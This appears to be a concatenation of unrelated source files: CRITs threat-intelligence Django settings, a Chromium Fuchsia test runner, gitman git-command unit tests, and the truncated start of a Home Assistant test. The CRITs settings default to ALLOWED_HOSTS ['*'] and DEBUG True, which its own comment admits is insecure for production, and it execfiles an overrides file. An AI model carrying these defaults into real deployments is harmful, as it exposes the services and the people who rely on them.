COL_BACKDOORS = "backdoors" # backdoors
COL_BUCKET_LISTS = "bucket_lists" # bucketlist information
COL_CAMPAIGNS = "campaigns" # campaigns list
COL_CERTIFICATES = "certificates" # certificates list
COL_COMMENTS = "comments" # comments collection
COL_CONFIG = "config" # config collection
COL_COUNTS = "counts" # general counts for dashboard
COL_DIVISION_DATA = "division_data" # information on divisions within company
COL_DOMAINS = "domains" # root domains with FQDNs and IP information
COL_EFFECTIVE_TLDS = "effective_tlds" # list of effective TLDs from Mozilla to determine root domains
COL_EMAIL = "email" # main email collection
COL_EVENTS = "events" # main events collection
COL_EVENT_TYPES = "event_types" # event types for events
COL_EXPLOITS = "exploits" # exploits
COL_FILETYPES = "filetypes" # list of filetypes in system generated by MapReduce
COL_IDB_ACTIONS = "idb_actions" # list of available actions to be taken with indicators
COL_INDICATORS = "indicators" # main indicators collection
COL_INTERNAL_LOCATIONS = "internal_locations" # site locations for company
COL_IPS = "ips" # IPs collection
COL_LOCATIONS = "locations" # Locations collection
COL_NOTIFICATIONS = "notifications" # notifications collection
COL_OBJECTS = "objects" # objects that are files that have been added
COL_OBJECT_TYPES = "object_types" # types of objects that can be added
COL_PCAPS = "pcaps" # main pcaps collection
COL_RAW_DATA = "raw_data" # main raw data collection
COL_RAW_DATA_TYPES = "raw_data_types" # list of available raw data types
COL_RELATIONSHIP_TYPES = "relationship_types" # list of available relationship types
COL_SAMPLES = "sample" # main samples collection
COL_SCREENSHOTS = "screenshots" # main screenshots collection
COL_SECTOR_LISTS = "sector_lists" # sector lists information
COL_SECTORS = "sectors" # available sectors
COL_SERVICES = "services" # list of services for scanning
COL_SIGNATURES = "signatures" # main signature collection
COL_SIGNATURE_TYPES = "signature_types" # list of available signature types
COL_SIGNATURE_DEPENDENCY = "signature_dependency" # list of available signature dependencies
COL_SOURCE_ACCESS = "source_access" # source access ACL collection
COL_SOURCES = "sources" # source information generated by MapReduce
COL_STATISTICS = "statistics" # list of statistics for different objects (campaigns, for example)
COL_TARGETS = "targets" # target information for use in email
COL_USERS = "users" # main users collection
COL_USER_ROLES = "user_roles" # main user roles collection
COL_YARAHITS = "yarahits" # yara hit counts for samples
# MongoDB connection pool
if MONGO_USER:
connect(MONGO_DATABASE, host=MONGO_HOST, port=MONGO_PORT, read_preference=MONGO_READ_PREFERENCE, ssl=MONGO_SSL,
username=MONGO_USER, password=MONGO_PASSWORD)
else:
connect(MONGO_DATABASE, host=MONGO_HOST, port=MONGO_PORT, read_preference=MONGO_READ_PREFERENCE, ssl=MONGO_SSL)
# Get config from DB
c = MongoClient(MONGO_HOST, MONGO_PORT, ssl=MONGO_SSL)
db = c[MONGO_DATABASE]
if MONGO_USER:
db.authenticate(MONGO_USER, MONGO_PASSWORD)
coll = db[COL_CONFIG]
crits_config = coll.find_one({})
if not crits_config:
crits_config = {}
# Populate settings
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
# NOTE: we are setting ALLOWED_HOSTS to ['*'] by default which will work
# everywhere but is insecure for production installations (no less secure
# than setting DEBUG to True). This is done because we can't anticipate
# the host header for every CRITs install and this should work "out of
# the box".
ALLOWED_HOSTS = crits_config.get('allowed_hosts', ['*'])
COMPANY_NAME = crits_config.get('company_name', 'My Company')
CLASSIFICATION = crits_config.get('classification', 'unclassified')
CRITS_EMAIL = crits_config.get('crits_email', '')
CRITS_EMAIL_SUBJECT_TAG = crits_config.get('crits_email_subject_tag', '')
CRITS_EMAIL_END_TAG = crits_config.get('crits_email_end_tag', True)
DEBUG = crits_config.get('debug', True)
if crits_config.get('email_host', None):
EMAIL_HOST = crits_config.get('email_host', None)
if crits_config.get('email_port', None):
EMAIL_PORT = int(crits_config.get('email_port', None))
ENABLE_API = crits_config.get('enable_api', False)
ENABLE_TOASTS = crits_config.get('enable_toasts', False)
GIT_REPO_URL = crits_config.get('git_repo_url', '')
HTTP_PROXY = crits_config.get('http_proxy', None)
INSTANCE_NAME = crits_config.get('instance_name', 'My Instance')
INSTANCE_URL = crits_config.get('instance_url', '')
INVALID_LOGIN_ATTEMPTS = crits_config.get('invalid_login_attempts', 3) - 1
LANGUAGE_CODE = crits_config.get('language_code', 'en-us')
LDAP_AUTH = crits_config.get('ldap_auth', False)
LDAP_SERVER = crits_config.get('ldap_server', '')
LDAP_USERDN = crits_config.get('ldap_userdn', '')
LDAP_USERCN = crits_config.get('ldap_usercn', '')
LOG_DIRECTORY = crits_config.get('log_directory', os.path.join(SITE_ROOT, '..', 'logs'))
LOG_LEVEL = crits_config.get('log_level', 'INFO')
QUERY_CACHING = crits_config.get('query_caching', False)
RT_URL = crits_config.get('rt_url', None)
SECURE_COOKIE = crits_config.get('secure_cookie', True)
SERVICE_DIRS = tuple(crits_config.get('service_dirs', []))
SERVICE_MODEL = crits_config.get('service_model', SERVICE_MODEL)
SERVICE_POOL_SIZE = int(crits_config.get('service_pool_size', 12))
SESSION_TIMEOUT = int(crits_config.get('session_timeout', 12)) * 60 * 60
SPLUNK_SEARCH_URL = crits_config.get('splunk_search_url', None)
TEMP_DIR = crits_config.get('temp_dir', '/tmp')
TIME_ZONE = crits_config.get('timezone', 'America/New_York')
ZIP7_PATH = crits_config.get('zip7_path', '/usr/bin/7z')
ZIP7_PASSWORD = crits_config.get('zip7_password', 'infected')
REMOTE_USER = crits_config.get('remote_user', False)
PASSWORD_COMPLEXITY_REGEX = crits_config.get('password_complexity_regex', '(?=^.{8,}$)((?=.*\d)|(?=.*\W+))(?![.\n])(?=.*[A-Z])(?=.*[a-z]).*$')
PASSWORD_COMPLEXITY_DESC = crits_config.get('password_complexity_desc', '8 characters, at least 1 capital, 1 lowercase and 1 number/special')
DEPTH_MAX = crits_config.get('depth_max', '10')
TOTAL_MAX = crits_config.get('total_max', '250')
REL_MAX = crits_config.get('rel_max', '50')
TOTP = crits_config.get('totp', False)
COLLECTION_TO_BUCKET_MAPPING = {
COL_PCAPS: BUCKET_PCAPS,
COL_OBJECTS: BUCKET_OBJECTS,
COL_SAMPLES: BUCKET_SAMPLES
}
# check Log Directory
if not os.path.exists(LOG_DIRECTORY):
LOG_DIRECTORY = os.path.join(SITE_ROOT, '..', 'logs')
# Custom settings for Django
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# DATE and DATETIME Formats
DATE_FORMAT = 'Y-m-d'
DATETIME_FORMAT = 'Y-m-d H:i:s.u'
PY_DATE_FORMAT = '%Y-%m-%d'
PY_TIME_FORMAT = '%H:%M:%S.%f'
PY_DATETIME_FORMAT = ' '.join([PY_DATE_FORMAT, PY_TIME_FORMAT])
OLD_PY_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
PY_FORM_DATETIME_FORMATS = [PY_DATETIME_FORMAT, OLD_PY_DATETIME_FORMAT]
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(SITE_ROOT, '../extras/www')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/'
STATIC_ROOT = os.path.join(SITE_ROOT, '../extras/www/static')
STATIC_URL = '/static/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
#'django.template.loaders.eggs.load_template_source',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'crits.core.views.base_context',
'crits.core.views.collections',
'crits.core.views.user_context',
)
ROOT_URLCONF = 'crits.urls'
TEMPLATE_DIRS = (
os.path.join(SITE_ROOT, '../documentation'),
os.path.join(SITE_ROOT, 'core/templates'),
os.path.join(SITE_ROOT, 'actors/templates'),
os.path.join(SITE_ROOT, 'backdoors/templates'),
os.path.join(SITE_ROOT, 'core/dashboard/templates'),
os.path.join(SITE_ROOT, 'campaigns/templates'),
os.path.join(SITE_ROOT, 'certificates/templates'),
os.path.join(SITE_ROOT, 'comments/templates'),
os.path.join(SITE_ROOT, 'config/templates'),
os.path.join(SITE_ROOT, 'domains/templates'),
os.path.join(SITE_ROOT, 'emails/templates'),
os.path.join(SITE_ROOT, 'events/templates'),
os.path.join(SITE_ROOT, 'exploits/templates'),
os.path.join(SITE_ROOT, 'indicators/templates'),
os.path.join(SITE_ROOT, 'ips/templates'),
os.path.join(SITE_ROOT, 'locations/templates'),
os.path.join(SITE_ROOT, 'objects/templates'),
os.path.join(SITE_ROOT, 'pcaps/templates'),
os.path.join(SITE_ROOT, 'raw_data/templates'),
os.path.join(SITE_ROOT, 'relationships/templates'),
os.path.join(SITE_ROOT, 'samples/templates'),
os.path.join(SITE_ROOT, 'screenshots/templates'),
os.path.join(SITE_ROOT, 'services/templates'),
os.path.join(SITE_ROOT, 'signatures/templates'),
os.path.join(SITE_ROOT, 'stats/templates'),
os.path.join(SITE_ROOT, 'targets/templates'),
os.path.join(SITE_ROOT, 'core/templates/dialogs'),
os.path.join(SITE_ROOT, 'campaigns/templates/dialogs'),
os.path.join(SITE_ROOT, 'comments/templates/dialogs'),
os.path.join(SITE_ROOT, 'locations/templates/dialogs'),
os.path.join(SITE_ROOT, 'objects/templates/dialogs'),
os.path.join(SITE_ROOT, 'raw_data/templates/dialogs'),
os.path.join(SITE_ROOT, 'relationships/templates/dialogs'),
os.path.join(SITE_ROOT, 'screenshots/templates/dialogs'),
os.path.join(SITE_ROOT, 'signatures/templates/dialogs'),
)
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, 'core/static'),
os.path.join(SITE_ROOT, 'actors/static'),
os.path.join(SITE_ROOT, 'backdoors/static'),
os.path.join(SITE_ROOT, 'dashboards/static'),
os.path.join(SITE_ROOT, 'campaigns/static'),
os.path.join(SITE_ROOT, 'certificates/static'),
os.path.join(SITE_ROOT, 'comments/static'),
os.path.join(SITE_ROOT, 'domains/static'),
os.path.join(SITE_ROOT, 'emails/static'),
os.path.join(SITE_ROOT, 'events/static'),
os.path.join(SITE_ROOT, 'exploits/static'),
os.path.join(SITE_ROOT, 'indicators/static'),
os.path.join(SITE_ROOT, 'ips/static'),
os.path.join(SITE_ROOT, 'locations/static'),
os.path.join(SITE_ROOT, 'objects/static'),
os.path.join(SITE_ROOT, 'pcaps/static'),
os.path.join(SITE_ROOT, 'raw_data/static'),
os.path.join(SITE_ROOT, 'relationships/static'),
os.path.join(SITE_ROOT, 'samples/static'),
os.path.join(SITE_ROOT, 'screenshots/static'),
os.path.join(SITE_ROOT, 'services/static'),
os.path.join(SITE_ROOT, 'signatures/static'),
os.path.join(SITE_ROOT, 'config/static'),
os.path.join(SITE_ROOT, 'targets/static'),
)
INSTALLED_APPS = (
'crits.core',
'crits.dashboards',
'django.contrib.auth',
'mongoengine.django.mongo_auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'crits.actors',
'crits.campaigns',
'crits.certificates',
'crits.domains',
'crits.emails',
'crits.events',
'crits.indicators',
'crits.ips',
'crits.locations',
'crits.objects',
'crits.pcaps',
'crits.raw_data',
'crits.relationships',
'crits.samples',
'crits.screenshots',
'crits.services',
'crits.signatures',
'crits.stats',
'crits.targets',
'tastypie',
'tastypie_mongoengine',
)
AUTH_USER_MODEL = 'mongo_auth.MongoUser'
MONGOENGINE_USER_DOCUMENT = 'crits.core.user.CRITsUser'
SESSION_ENGINE = 'mongoengine.django.sessions'
AUTHENTICATION_BACKENDS = (
#'mongoengine.django.auth.MongoEngineBackend',
'crits.core.user.CRITsAuthBackend',
)
if REMOTE_USER:
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.RemoteUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
AUTHENTICATION_BACKENDS = (
'crits.core.user.CRITsRemoteUserBackend',
)
# Handle logging after all custom configuration
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': "%(levelname)s %(asctime)s %(name)s %(message)s"
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'normal': {
'level': LOG_LEVEL,
'class': 'logging.FileHandler',
'formatter': 'verbose',
'filename': os.path.join(LOG_DIRECTORY, 'crits.log'),
},
},
'loggers': {
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'crits': {
'handlers': ['normal'],
'propagate': True,
'level': 'DEBUG',
},
},
}
# Handle creating log directories if they do not exist
for handler in LOGGING['handlers'].values():
log_file = handler.get('filename')
if log_file:
log_dir = os.path.dirname(log_file)
if not os.path.exists(log_dir):
try:
os.makedirs(log_dir)
except OSError as e:
# If file exists
if e.args[0] == errno.EEXIST:
pass
# re-raise on error that is not
# easy to automatically handle, such
# as permission errors
else:
raise
# CRITs Types
CRITS_TYPES = {
# 'Actor': COL_ACTORS,
# 'AnalysisResult': COL_ANALYSIS_RESULTS,
# 'Backdoor': COL_BACKDOORS,
'Campaign': COL_CAMPAIGNS,
# 'Certificate': COL_CERTIFICATES,
'Comment': COL_COMMENTS,
'Domain': COL_DOMAINS,
'Email': COL_EMAIL,
# 'Event': COL_EVENTS,
# 'Exploit': COL_EXPLOITS,
# 'Indicator': COL_INDICATORS,
'IP': COL_IPS,
'Notification': COL_NOTIFICATIONS,
# 'PCAP': COL_PCAPS,
# 'RawData': COL_RAW_DATA,
'Sample': COL_SAMPLES,
'Screenshot': COL_SCREENSHOTS,
# 'Signature': COL_SIGNATURES,
# 'Target': COL_TARGETS,
}
# Custom template lists for loading in different places in the UI
SERVICE_NAV_TEMPLATES = ()
SERVICE_CP_TEMPLATES = ()
SERVICE_TAB_TEMPLATES = ()
# discover services
for service_directory in SERVICE_DIRS:
if os.path.isdir(service_directory):
sys.path.insert(0, service_directory)
for d in os.listdir(service_directory):
abs_path = os.path.join(service_directory, d, 'templates')
if os.path.isdir(abs_path):
TEMPLATE_DIRS = TEMPLATE_DIRS + (abs_path,)
nav_items = os.path.join(abs_path, '%s_nav_items.html' % d)
cp_items = os.path.join(abs_path, '%s_cp_items.html' % d)
view_items = os.path.join(service_directory, d, 'views.py')
if os.path.isfile(nav_items):
SERVICE_NAV_TEMPLATES = SERVICE_NAV_TEMPLATES + ('%s_nav_items.html' % d,)
if os.path.isfile(cp_items):
SERVICE_CP_TEMPLATES = SERVICE_CP_TEMPLATES + ('%s_cp_items.html' % d,)
if os.path.isfile(view_items):
if '%s_context' % d in open(view_items).read():
context_module = '%s.views.%s_context' % (d, d)
TEMPLATE_CONTEXT_PROCESSORS = TEMPLATE_CONTEXT_PROCESSORS + (context_module,)
for tab_temp in glob.glob('%s/*_tab.html' % abs_path):
head, tail = os.path.split(tab_temp)
ctype = tail.split('_')[-2]
name = "_".join(tail.split('_')[:-2])
SERVICE_TAB_TEMPLATES = SERVICE_TAB_TEMPLATES + ((ctype, name, tail),)
# Allow configuration of the META or HEADER variable is used to find
# remote username when REMOTE_USER is enabled.
REMOTE_USER_META = 'REMOTE_USER'
# The next example could be used for reverse proxy setups
# where your frontend might pass Remote-User: header.
#
# WARNING: If you enable this, be 100% certain your backend is not
# directly accessible and this header could be spoofed by an attacker.
#
# REMOTE_USER_META = 'HTTP_REMOTE_USER'
# Import custom settings if it exists
csfile = os.path.join(SITE_ROOT, 'config/overrides.py')
if os.path.exists(csfile):
execfile(csfile)
|
|
#!/usr/bin/env python
#
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Deploys and runs a test package on a Fuchsia target."""
import argparse
import os
import runner_logs
import sys
from common_args import AddCommonArgs, AddTargetSpecificArgs, \
ConfigureLogging, GetDeploymentTargetForArgs
from net_test_server import SetupTestServer
from run_test_package import RunTestPackage, RunTestPackageArgs, SystemLogReader
from runner_exceptions import HandleExceptionAndReturnExitCode
from runner_logs import RunnerLogManager
from symbolizer import BuildIdsPaths
DEFAULT_TEST_SERVER_CONCURRENCY = 4
TEST_DATA_DIR = '/tmp'
TEST_FILTER_PATH = TEST_DATA_DIR + '/test_filter.txt'
TEST_LLVM_PROFILE_PATH = TEST_DATA_DIR + '/llvm-profile'
TEST_PERF_RESULT_PATH = TEST_DATA_DIR + '/test_perf_summary.json'
TEST_RESULT_PATH = TEST_DATA_DIR + '/test_summary.json'
TEST_REALM_NAME = 'chromium_tests'
def AddTestExecutionArgs(arg_parser):
test_args = arg_parser.add_argument_group('testing',
'Test execution arguments')
test_args.add_argument('--gtest_filter',
help='GTest filter to use in place of any default.')
test_args.add_argument(
'--gtest_repeat',
help='GTest repeat value to use. This also disables the '
'test launcher timeout.')
test_args.add_argument(
'--test-launcher-retry-limit',
help='Number of times that test suite will retry failing '
'tests. This is multiplicative with --gtest_repeat.')
test_args.add_argument('--test-launcher-shard-index',
type=int,
default=os.environ.get('GTEST_SHARD_INDEX'),
help='Index of this instance amongst swarming shards.')
test_args.add_argument('--test-launcher-total-shards',
type=int,
default=os.environ.get('GTEST_TOTAL_SHARDS'),
help='Total number of swarming shards of this suite.')
test_args.add_argument('--gtest_break_on_failure',
action='store_true',
default=False,
help='Should GTest break on failure; useful with '
'--gtest_repeat.')
test_args.add_argument('--single-process-tests',
action='store_true',
default=False,
help='Runs the tests and the launcher in the same '
'process. Useful for debugging.')
test_args.add_argument('--test-launcher-batch-limit',
type=int,
help='Sets the limit of test batch to run in a single '
'process.')
# --test-launcher-filter-file is specified relative to --out-dir,
# so specifying type=os.path.* will break it.
test_args.add_argument(
'--test-launcher-filter-file',
default=None,
help='Override default filter file passed to target test '
'process. Set an empty path to disable filtering.')
test_args.add_argument('--test-launcher-jobs',
type=int,
help='Sets the number of parallel test jobs.')
test_args.add_argument('--test-launcher-summary-output',
help='Where the test launcher will output its json.')
test_args.add_argument('--enable-test-server',
action='store_true',
default=False,
help='Enable Chrome test server spawner.')
test_args.add_argument(
'--test-launcher-bot-mode',
action='store_true',
default=False,
help='Informs the TestLauncher to that it should enable '
'special allowances for running on a test bot.')
test_args.add_argument('--isolated-script-test-output',
help='If present, store test results on this path.')
test_args.add_argument(
'--isolated-script-test-perf-output',
help='If present, store chartjson results on this path.')
test_args.add_argument('--use-run-test-component',
default=False,
action='store_true',
help='Run the test package hermetically using '
'run-test-component, rather than run.')
test_args.add_argument(
'--code-coverage',
default=False,
action='store_true',
help='Gather code coverage information and place it in '
'the output directory.')
test_args.add_argument('--code-coverage-dir',
default=os.getcwd(),
help='Directory to place code coverage information. '
'Only relevant when --code-coverage set to true. '
'Defaults to current directory.')
test_args.add_argument('--child-arg',
action='append',
help='Arguments for the test process.')
test_args.add_argument('child_args',
nargs='*',
help='Arguments for the test process.')
def main():
parser = argparse.ArgumentParser()
AddTestExecutionArgs(parser)
AddCommonArgs(parser)
AddTargetSpecificArgs(parser)
args = parser.parse_args()
# Flag out_dir is required for tests launched with this script.
if not args.out_dir:
raise ValueError("out-dir must be specified.")
# Code coverage uses runtests, which calls run_test_component.
if args.code_coverage:
args.use_run_test_component = True
ConfigureLogging(args)
child_args = []
if args.test_launcher_shard_index != None:
child_args.append(
'--test-launcher-shard-index=%d' % args.test_launcher_shard_index)
if args.test_launcher_total_shards != None:
child_args.append(
'--test-launcher-total-shards=%d' % args.test_launcher_total_shards)
if args.single_process_tests:
child_args.append('--single-process-tests')
if args.test_launcher_bot_mode:
child_args.append('--test-launcher-bot-mode')
if args.test_launcher_batch_limit:
child_args.append('--test-launcher-batch-limit=%d' %
args.test_launcher_batch_limit)
# Only set --test-launcher-jobs if the caller specifies it, in general.
# If the caller enables the test-server then we need to launch the right
# number of instances to match the maximum number of parallel test jobs, so
# in that case we set --test-launcher-jobs based on the number of CPU cores
# specified for the emulator to use.
test_concurrency = None
if args.test_launcher_jobs:
test_concurrency = args.test_launcher_jobs
elif args.enable_test_server:
if args.device == 'device':
test_concurrency = DEFAULT_TEST_SERVER_CONCURRENCY
else:
test_concurrency = args.cpu_cores
if test_concurrency:
child_args.append('--test-launcher-jobs=%d' % test_concurrency)
if args.gtest_filter:
child_args.append('--gtest_filter=' + args.gtest_filter)
if args.gtest_repeat:
child_args.append('--gtest_repeat=' + args.gtest_repeat)
child_args.append('--test-launcher-timeout=-1')
if args.test_launcher_retry_limit:
child_args.append(
'--test-launcher-retry-limit=' + args.test_launcher_retry_limit)
if args.gtest_break_on_failure:
child_args.append('--gtest_break_on_failure')
if args.test_launcher_summary_output:
child_args.append('--test-launcher-summary-output=' + TEST_RESULT_PATH)
if args.isolated_script_test_output:
child_args.append('--isolated-script-test-output=' + TEST_RESULT_PATH)
if args.isolated_script_test_perf_output:
child_args.append('--isolated-script-test-perf-output=' +
TEST_PERF_RESULT_PATH)
if args.child_arg:
child_args.extend(args.child_arg)
if args.child_args:
child_args.extend(args.child_args)
test_realms = []
if args.use_run_test_component:
test_realms = [TEST_REALM_NAME]
try:
with GetDeploymentTargetForArgs(args) as target, \
SystemLogReader() as system_logger, \
RunnerLogManager(args.runner_logs_dir, BuildIdsPaths(args.package)):
target.Start()
if args.system_log_file and args.system_log_file != '-':
system_logger.Start(target, args.package, args.system_log_file)
if args.test_launcher_filter_file:
target.PutFile(args.test_launcher_filter_file,
TEST_FILTER_PATH,
for_package=args.package_name,
for_realms=test_realms)
child_args.append('--test-launcher-filter-file=' + TEST_FILTER_PATH)
test_server = None
if args.enable_test_server:
assert test_concurrency
test_server = SetupTestServer(target, test_concurrency,
args.package_name, test_realms)
run_package_args = RunTestPackageArgs.FromCommonArgs(args)
if args.use_run_test_component:
run_package_args.test_realm_label = TEST_REALM_NAME
run_package_args.use_run_test_component = True
returncode = RunTestPackage(args.out_dir, target, args.package,
args.package_name, child_args,
run_package_args)
if test_server:
test_server.Stop()
if args.code_coverage:
# Copy all the files in the profile directory. /* is used instead
# of recursively copying due to permission issues for the latter.
target.GetFile(TEST_LLVM_PROFILE_PATH + '/*', args.code_coverage_dir)
if args.test_launcher_summary_output:
target.GetFile(TEST_RESULT_PATH,
args.test_launcher_summary_output,
for_package=args.package_name,
for_realms=test_realms)
if args.isolated_script_test_output:
target.GetFile(TEST_RESULT_PATH,
args.isolated_script_test_output,
for_package=args.package_name,
for_realms=test_realms)
if args.isolated_script_test_perf_output:
target.GetFile(TEST_PERF_RESULT_PATH,
args.isolated_script_test_perf_output,
for_package=args.package_name,
for_realms=test_realms)
return returncode
except:
return HandleExceptionAndReturnExitCode()
if __name__ == '__main__':
sys.exit(main())
|
|
# pylint: disable=no-self-use
import os
from unittest.mock import Mock, patch
from gitman import git, settings
from gitman.exceptions import ShellError
from .utils import check_calls
@patch('gitman.git.call')
class TestGit:
"""Tests for calls to Git."""
@patch('os.path.isdir', Mock(return_value=False))
def test_clone(self, mock_call):
"""Verify the commands to set up a new reference repository."""
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call,
[
"git clone --mirror mock.git "
+ os.path.normpath("cache/mock.reference"),
"git clone --reference "
+ os.path.normpath("cache/mock.reference")
+ " mock.git "
+ os.path.normpath("mock/path"),
],
)
@patch('os.path.isdir', Mock(return_value=False))
def test_clone_without_cache(self, mock_call):
"""Verify the commands to clone a repository."""
settings.CACHE_DISABLE = True
try:
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call, ["git clone mock.git " + os.path.normpath("mock/path")]
)
finally:
settings.CACHE_DISABLE = False
@patch('os.path.isdir', Mock(return_value=True))
def test_clone_from_reference(self, mock_call):
"""Verify the commands to clone a Git repository from a reference."""
git.clone('git', 'mock.git', 'mock/path', cache='cache')
check_calls(
mock_call,
[
"git clone --reference "
+ os.path.normpath("cache/mock.reference")
+ " mock.git "
+ os.path.normpath("mock/path")
],
)
def test_fetch(self, mock_call):
"""Verify the commands to fetch from a Git repository."""
git.fetch('git', 'mock.git', 'mock/path')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
def test_fetch_rev(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ rev."""
git.fetch('git', 'mock.git', 'mock/path', 'mock-rev')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin mock-rev",
],
)
def test_fetch_rev_sha(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ SHA."""
git.fetch('git', 'mock.git', 'mock/path', 'abcdef1234' * 4)
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
def test_fetch_rev_revparse(self, mock_call):
"""Verify the commands to fetch from a Git repository w/ rev-parse."""
git.fetch('git', 'mock.git', 'mock/path', 'master@{2015-02-12 18:30:00}')
check_calls(
mock_call,
[
"git remote set-url origin mock.git",
"git fetch --tags --force --prune origin",
],
)
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid(self, _):
"""Verify the commands to check for a working tree and is toplevel of repo."""
with patch(
'gitman.git.call', Mock(return_value=['mock/outside_repo/nested_repo'])
):
assert True is git.valid()
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid_false_outside_work_tree(self, _):
"""Verify a shell error indicating it is not in a working tree returns false."""
with patch('gitman.git.call', Mock(side_effect=ShellError)):
assert False is git.valid()
@patch('os.getcwd', Mock(return_value='mock/outside_repo/nested_repo'))
def test_valid_false_current_not_toplevel(self, _):
"""Verify git toplevel matches current directory"""
with patch('gitman.git.call', Mock(return_value=['mock/outside_repo'])):
assert False is git.valid()
def test_rebuild(self, mock_call):
"""Verify the commands to rebuild a Git repository"""
git.rebuild('git', 'master@{2015-02-12 18:30:00}')
check_calls(
mock_call,
["git init", "git remote add origin master@{2015-02-12 18:30:00}"],
)
def test_rebuild_gitsvn(self, mock_call):
"""Verify the rebuild is ignored with git-svn type"""
git.rebuild('git-svn', 'master@{2015-02-12 18:30:00}')
check_calls(mock_call, [])
def test_changes(self, mock_call):
"""Verify the commands to check for uncommitted changes."""
git.changes('git', include_untracked=True)
check_calls(
mock_call,
[
# based on: http://stackoverflow.com/questions/3878624
"git update-index -q --refresh",
"git diff-index --quiet HEAD",
"git ls-files --others --exclude-standard",
"git status", # used for displaying the overall status
],
)
def test_changes_false(self, _):
"""Verify the absence of changes can be detected."""
with patch('gitman.git.call', Mock(return_value=[""])):
assert False is git.changes('git')
def test_changes_false_with_untracked(self, _):
"""Verify untracked files can be detected."""
with patch('gitman.git.call', Mock(return_value=["file_1"])):
assert False is git.changes('git')
def test_changes_true_when_untracked_included(self, _):
"""Verify untracked files can be detected."""
with patch('gitman.git.call', Mock(return_value=["file_1"])):
assert True is git.changes('git', include_untracked=True)
def test_changes_true_when_uncommitted(self, _):
"""Verify uncommitted changes can be detected."""
with patch('gitman.git.call', Mock(side_effect=ShellError)):
assert True is git.changes('git', display_status=False)
def test_update(self, mock_call):
"""Verify the commands to update a working tree to a revision."""
git.update('git', 'mock.git', 'mock/path', rev='mock_rev')
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_rev",
"git branch --set-upstream-to origin/mock_rev",
],
)
def test_update_branch(self, mock_call):
"""Verify the commands to update a working tree to a branch."""
git.update('git', 'mock.git', 'mock/path', fetch=True, rev='mock_branch')
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_branch",
"git branch --set-upstream-to origin/mock_branch",
"git pull --ff-only --no-rebase",
],
)
def test_update_no_clean(self, mock_call):
git.update('git', 'mock.git', 'mock/path', clean=False, rev='mock_rev')
check_calls(
mock_call,
[
"git stash",
"git checkout --force mock_rev",
"git branch --set-upstream-to origin/mock_rev",
],
)
def test_update_revparse(self, mock_call):
"""Verify the commands to update a working tree to a rev-parse."""
mock_call.return_value = ["abc123"]
git.update(
'git', 'mock.git', 'mock/path', rev='mock_branch@{2015-02-12 18:30:00}'
)
check_calls(
mock_call,
[
"git stash",
"git clean --force -d -x",
"git checkout --force mock_branch",
(
"git rev-list -n 1 --before='2015-02-12 18:30:00' "
"--first-parent mock_branch"
),
"git checkout --force abc123",
"git branch --set-upstream-to origin/abc123",
],
)
def test_get_url(self, mock_call):
"""Verify the commands to get the current repository's URL."""
git.get_url('git')
check_calls(mock_call, ["git config --get remote.origin.url"])
def test_get_hash(self, mock_call):
"""Verify the commands to get the working tree's hash."""
git.get_hash('git')
check_calls(mock_call, ["git rev-parse HEAD"])
def test_get_tag(self, mock_call):
"""Verify the commands to get the working tree's tag."""
git.get_tag()
check_calls(mock_call, ["git describe --tags --exact-match"])
def test_get_branch(self, mock_call):
"""Verify the commands to get the working tree's branch."""
git.get_branch()
check_calls(mock_call, ["git rev-parse --abbrev-ref HEAD"])
|
|
"""Test the condition helper."""
from logging import ERROR
import pytest
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import condition
from homeassistant.helpers.template import Template
